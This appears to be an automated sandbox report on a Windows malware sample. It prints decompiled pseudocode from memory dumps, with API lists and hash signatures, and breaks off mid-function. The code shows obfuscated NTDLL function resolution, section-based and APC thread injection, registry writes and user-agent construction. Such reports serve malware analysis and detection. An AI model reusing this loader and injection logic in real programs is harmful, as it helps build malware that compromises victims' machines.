					_t50 = GetModuleHandleA( *0x6e1a41c4 + 0x6e1a5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e1a41c4 + 0x6e1a5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E1A1397(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e1a41c4 + 0x6e1a5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e1a41c4 + 0x6e1a5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e1a41c4 + 0x6e1a5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e1a41c4 + 0x6e1a519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1A13B8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e1a19d0
0x6e1a19d4
0x6e1a1a95
0x6e1a19da
0x6e1a19f2
0x6e1a1a01
0x6e1a1a08
0x6e1a1a0a
0x6e1a1a0f
0x6e1a1a8d
0x6e1a1a8e
0x6e1a1a11
0x6e1a1a1e
0x6e1a1a20
0x6e1a1a25
0x00000000
0x6e1a1a27
0x6e1a1a34
0x6e1a1a36
0x6e1a1a3b
0x00000000
0x6e1a1a3d
0x6e1a1a4a
0x6e1a1a4c
0x6e1a1a51
0x00000000
0x6e1a1a53
0x6e1a1a60
0x6e1a1a62
0x6e1a1a67
0x00000000
0x6e1a1a69
0x6e1a1a6f
0x6e1a1a75
0x6e1a1a7a
0x6e1a1a7f
0x6e1a1a84
0x00000000
0x6e1a1a86
0x6e1a1a89
0x6e1a1a89
0x6e1a1a84
0x6e1a1a67
0x6e1a1a51
0x6e1a1a3b
0x6e1a1a25
0x6e1a1a0f
0x6e1a1aa3

APIs

Part of subcall function 6E1A1000: HeapAlloc.KERNEL32(00000000,?,6E1A15ED,00000030,74E063F0,00000000), ref: 6E1A100C

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1A1051,?,?,?,?), ref: 6E1A19E6
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A08
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A1E
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A34
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A4A
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A1A60

Part of subcall function 6E1A13B8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 6E1A1415
Part of subcall function 6E1A13B8: memset.NTDLL ref: 6E1A1437

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 9b8fb1d21034cba7cab44ba0346c06cb02cdd2ef30fe78b31fab99451984a87f
Instruction ID: ad6955b03e74cae4c8b0fad7b21885715657081246b594411e79fcc0b3fdb057
Opcode Fuzzy Hash: 9b8fb1d21034cba7cab44ba0346c06cb02cdd2ef30fe78b31fab99451984a87f
Instruction Fuzzy Hash: CC219EB4304A4B9FDB01DFADCD44D7E7BECEF552007104465EA54D7240EB30E909AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B04837, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B04837(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00B075F6(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xb0d2e0; // 0xdca5a8
					_t1 = _t23 + 0xb0e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xb0d2e0; // 0xdca5a8
					_t2 = _t26 + 0xb0e782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00B04AAB(_t54);
					} else {
						_t30 =  *0xb0d2e0; // 0xdca5a8
						_t5 = _t30 + 0xb0e76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xb0d2e0; // 0xdca5a8
							_t7 = _t33 + 0xb0e4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xb0d2e0; // 0xdca5a8
								_t9 = _t36 + 0xb0e406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xb0d2e0; // 0xdca5a8
									_t11 = _t39 + 0xb0e792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00B09269(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00b04846
0x00b0484a
0x00b0490c
0x00b04850
0x00b04850
0x00b04855
0x00b04868
0x00b0486a
0x00b0486f
0x00b04877
0x00b0487e
0x00b04880
0x00b04885
0x00b04904
0x00b04905
0x00b04887
0x00b04887
0x00b0488c
0x00b04894
0x00b04896
0x00b0489b
0x00000000
0x00b0489d
0x00b0489d
0x00b048a2
0x00b048aa
0x00b048ac
0x00b048b1
0x00000000
0x00b048b3
0x00b048b3
0x00b048b8
0x00b048c0
0x00b048c2
0x00b048c7
0x00000000
0x00b048c9
0x00b048c9
0x00b048ce
0x00b048d6
0x00b048d8
0x00b048dd
0x00000000
0x00b048df
0x00b048e5
0x00b048ea
0x00b048f1
0x00b048f6
0x00b048fb
0x00000000
0x00b048fd
0x00b04900
0x00b04900
0x00b048fb
0x00b048dd
0x00b048c7
0x00b048b1
0x00b0489b
0x00b04885
0x00b0491a

APIs

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00B0101C,?,00000001,?,?,00000000,00000000), ref: 00B0485C
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00B0487E
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00B04894
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00B048AA
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00B048C0
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00B048D6

Part of subcall function 00B09269: NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,74E04EE0,00000000,00000000,00B048F6), ref: 00B092C6
Part of subcall function 00B09269: memset.NTDLL ref: 00B092E8

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 1b423db767a11024b02adffb57e0c8b792c3c58cc48a9eb6d3011692da2c7d9d
Instruction ID: faa7f5e496d18dffaa1130ff01159cb91675e62d80ce8296c185f0f9ff48d8c5
Opcode Fuzzy Hash: 1b423db767a11024b02adffb57e0c8b792c3c58cc48a9eb6d3011692da2c7d9d
Instruction Fuzzy Hash: 812121F150060AAFDB10DFA9DD44D6BBBECEF1434470144A9EA56C72A1EB74E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B6A7, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00B78A07), ref: 00B5B6BE
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00B5B6D3
GetLastError.KERNEL32(00000000), ref: 00B5B6DE
TerminateThread.KERNEL32(00000000,00000000), ref: 00B5B6E8
CloseHandle.KERNEL32(00000000), ref: 00B5B6EF
SetLastError.KERNEL32(00000000), ref: 00B5B6F8

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 78fc7d7cfed066174e4177dd973fb1ec2257546c70a2f9e529cebaf78c7bcac2
Instruction ID: 4b38f6b2ac1a9d79aaaa7aea06f6c3bf90c5ef4047408378874c2fdafb778708
Opcode Fuzzy Hash: 78fc7d7cfed066174e4177dd973fb1ec2257546c70a2f9e529cebaf78c7bcac2
Instruction Fuzzy Hash: CDF08C32205661AFD3221FA1AC0CF5BBB68FF09752F004408FA09A2170CF208980CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B0282B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B0282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0xb0d37c);
					_t91 = 0x80000002;
					L6:
					_t59 = E00B01922( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E00B05C6E(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E00B04AAB(_a8);
						goto L29;
					}
					_t64 =  *0xb0d2b0; // 0x18d9b10
					_t16 = _t64 + 0xc; // 0x18d9bde
					_t65 = E00B01922(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d00b0c0, executed
						_t67 = E00B04A6D(_t97,  *_t33, _t91, _a8,  *0xb0d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0xb0d2e0; // 0xdca5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0xb0ea48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0xb0ea43; // 0x55434b48
								_t69 = _t34;
							}
							if(E00B05F64(_t69,  *0xb0d374,  *0xb0d378,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0xb0d2e0; // 0xdca5a8
									_t44 = _t71 + 0xb0e83e; // 0x74666f53
									_t73 = E00B01922(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d00b0c0
										E00B05DDA( *_t47, _t91, _a8,  *0xb0d378, _a24);
										_t49 = _t101 + 0x10; // 0x3d00b0c0
										E00B05DDA( *_t49, _t91, _t99,  *0xb0d370, _a16);
										E00B04AAB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d00b0c0
									E00B05DDA( *_t40, _t91, _a8,  *0xb0d378, _a24);
									_t43 = _t101 + 0x10; // 0x3d00b0c0, executed
									E00B05DDA( *_t43, _t91, _a8,  *0xb0d370, _a16); // executed
								}
								if( *_t101 != 0) {
									E00B04AAB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d00b0c0, executed
					_t81 = E00B063F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d00b0c0
							E00B04A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E00B04AAB(_t100);
						_t98 = _a16;
					}
					E00B04AAB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E00B0A938(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0xb0d37c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x00b0282b
0x00b02834
0x00b0283b
0x00b02840
0x00b028ad
0x00b028b3
0x00b028b8
0x00b028bf
0x00b028c4
0x00b028c9
0x00b02a34
0x00b02a3b
0x00b02a3b
0x00b02a40
0x00b02a42
0x00b02a42
0x00b02a4b
0x00b02a4b
0x00b028cf
0x00b028d4
0x00b028db
0x00b02a2a
0x00b02a2d
0x00000000
0x00b02a2d
0x00b028e1
0x00b028e6
0x00b028e9
0x00b028ee
0x00b028f3
0x00b0293c
0x00b0293c
0x00b0294f
0x00b02952
0x00b02959
0x00b0295f
0x00b02966
0x00b02970
0x00b02970
0x00b02968
0x00b02968
0x00b02968
0x00b02968
0x00b02992
0x00b0299a
0x00b029c8
0x00b029cd
0x00b029d4
0x00b029d9
0x00b029dd
0x00b02a0f
0x00b029df
0x00b029ec
0x00b029ef
0x00b029ff
0x00b02a02
0x00b02a08
0x00b02a08
0x00b0299c
0x00b029a9
0x00b029ac
0x00b029be
0x00b029c1
0x00b029c1
0x00b02a19
0x00b02a25
0x00b02a1b
0x00b02a1e
0x00b02a1e
0x00b02a19
0x00b02992
0x00000000
0x00b02959
0x00b02902
0x00b02905
0x00b0290c
0x00b02912
0x00b02915
0x00b02917
0x00b02923
0x00b02926
0x00b02926
0x00b0292c
0x00b02931
0x00b02931
0x00b02937
0x00000000
0x00b02937
0x00b02845
0x00000000
0x00b0286c
0x00b0286c
0x00b02878
0x00b0288b
0x00b02891
0x00b02899
0x00000000
0x00b02899

APIs

StrChrA.SHLWAPI(00B02197,0000005F,00000000,00000000,00000104), ref: 00B0285E
lstrcpy.KERNEL32(?,?), ref: 00B0288B

Part of subcall function 00B01922: lstrlen.KERNEL32(?,00000000,018D9B10,00000000,00B074FF,018D9CEE,?,?,?,?,?,69B25F44,00000005,00B0D00C), ref: 00B01929
Part of subcall function 00B01922: mbstowcs.NTDLL ref: 00B01952
Part of subcall function 00B01922: memset.NTDLL ref: 00B01964

Part of subcall function 00B05DDA: lstrlenW.KERNEL32(?,?,?,00B029F4,3D00B0C0,80000002,00B02197,00B0258B,74666F53,4D4C4B48,00B0258B,?,3D00B0C0,80000002,00B02197,?), ref: 00B05DFF

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

lstrcpy.KERNEL32(?,00000000), ref: 00B028AD

Strings

(, xrefs: 00B0290E
\, xrefs: 00B02891

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 0751ba2ba8c62a91e76becde7940b23648beba1fc59cfdd6350158c28217d808
Instruction ID: f227e1178b557490eae3f0424dd1d64bb4dc0d0ddecfe39d4a9a39809d8a05a2
Opcode Fuzzy Hash: 0751ba2ba8c62a91e76becde7940b23648beba1fc59cfdd6350158c28217d808
Instruction Fuzzy Hash: 57513F71200609AFDF229FA4DC48EAA3FF9FF58314F1085A4FA15971A1DB31D929DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B04F07, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B04F07(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0xb0d130(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E00B075F6(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xb0d2a4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00B04AAB(_v20);
											if(_v8 == 0) {
												_t54 = E00B03B3F(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00B0121A(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00b04f08
0x00b04f0e
0x00b04f19
0x00b04f19
0x00b04f1b
0x00b07613
0x00b07616
0x00b0761f
0x00b07622
0x00b07625
0x00b0762d
0x00b0772b
0x00b07731
0x00b07739
0x00b0773b
0x00000000
0x00b0773b
0x00b07633
0x00b07636
0x00b0773e
0x00b0773e
0x00b0763c
0x00b07643
0x00b0764b
0x00b07722
0x00b07651
0x00b07657
0x00b0765c
0x00b07661
0x00b07710
0x00b07667
0x00000000
0x00b07667
0x00b07667
0x00b07667
0x00b07667
0x00b0766c
0x00b0766e
0x00b0766e
0x00b0767b
0x00b07683
0x00000000
0x00000000
0x00b07685
0x00b07692
0x00b07698
0x00b07698
0x00b0769b
0x00000000
0x00000000
0x00b0769d
0x00b076a8
0x00b076bc
0x00b076f2
0x00b076be
0x00b076be
0x00b076c5
0x00b076cd
0x00000000
0x00b076cf
0x00b076cf
0x00b076d5
0x00b076dd
0x00b076e4
0x00000000
0x00b076e4
0x00b076dd
0x00b076cd
0x00b076f5
0x00b076f8
0x00b07700
0x00b07706
0x00b0770b
0x00b0770b
0x00000000
0x00b07700
0x00b076a5
0x00000000
0x00b076e7
0x00b076e7
0x00000000
0x00b076f0
0x00b07717
0x00b07717
0x00b0771d
0x00b0771d
0x00b0764b
0x00b07636
0x00b07748
0x00b04f10
0x00b04f10
0x00b04f17
0x00b04f22
0x00000000
0x00000000
0x00000000
0x00b04f17

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 00B076AF
GetLastError.KERNEL32 ref: 00B076CF

Part of subcall function 00B0121A: wcstombs.NTDLL ref: 00B012DC

Strings

@MtNt, xrefs: 00B0769F, 00B076CF, 00B0772B

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID: @MtNt
API String ID: 2344289193-3251738875
Opcode ID: c58da155e0dd5e4cde38ad5d6855570835b3d02e181fc2793e634d4be663a78e
Instruction ID: 3ac2083d4998222289e5635607135e7771d4ca414017b4390b0a2e6c19e9626a
Opcode Fuzzy Hash: c58da155e0dd5e4cde38ad5d6855570835b3d02e181fc2793e634d4be663a78e
Instruction Fuzzy Hash: 1B41F8B4D44209EFDB10AFA8C9849AEBFF8FB14345F2044A9E502E3191EB31AE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B09311, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00B09311(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xb0d364; // 0x18d95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xb0d364; // 0x18d95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xb0d030) {
					HeapFree( *0xb0d270, 0, _t8);
				}
				_t9 = E00B05141(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xb0d364; // 0x18d95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x00b09311
0x00b09311
0x00b0931a
0x00b0932a
0x00b0932a
0x00b0932f
0x00b09334
0x00000000
0x00000000
0x00b09324
0x00b09324
0x00b09336
0x00b0933a
0x00b0934c
0x00b0934c
0x00b09357
0x00b0935c
0x00b0935f
0x00b09364
0x00b09368
0x00b0936e

APIs

RtlEnterCriticalSection.NTDLL(018D9570), ref: 00B0931A
Sleep.KERNEL32(0000000A,?,00B05390), ref: 00B09324
HeapFree.KERNEL32(00000000,00000000,?,00B05390), ref: 00B0934C
RtlLeaveCriticalSection.NTDLL(018D9570), ref: 00B09368

Strings

Ut, xrefs: 00B0934C

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Ut
API String ID: 58946197-8415677
Opcode ID: 4e126dd40e20539a89a603696176677aea04fd10a3d42bad428d1afeec2df8e6
Instruction ID: 16b8b1d32ed39fb16cedf1a421d656e33c74069627db50655bede5fce4ed6185
Opcode Fuzzy Hash: 4e126dd40e20539a89a603696176677aea04fd10a3d42bad428d1afeec2df8e6
Instruction Fuzzy Hash: 65F0D471604241EFDB249FA8DD48B163FE8FB24340B048458B556D72F2DB20E844CE19

Uniqueness

Uniqueness Score: -1.00%

Function 00B0520D, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00B0520D(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00B0154A();
				if(_t21 != 0) {
					_t59 =  *0xb0d294; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xb0d294 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xb0d12c(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00B021DE( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xb0d2e0; // 0xdca5a8
					if( *0xb0d294 > 5) {
						_t8 = _t26 + 0xb0e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xb0e9f9; // 0x44283a44
						_t27 = _t7;
					}
					E00B011F4(_t27, _t27);
					_t31 = E00B03598(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xb0d2a8 =  *0xb0d2a8 ^ 0x81bbe65d;
						_t32 = E00B075F6(0x60);
						 *0xb0d364 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xb0d364; // 0x18d95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xb0d364; // 0x18d95b0
							 *_t51 = 0xb0e823;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xb0d270, 0, 0x43);
							 *0xb0d300 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xb0d294; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xb0d2e0; // 0xdca5a8
								_t13 = _t58 + 0xb0e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xb0c2a7);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00B0A82B( ~_v8 &  *0xb0d2a8, 0xb0d00c); // executed
								_t42 = E00B04C40(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00B074A5(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00B05461(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00B03FC2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
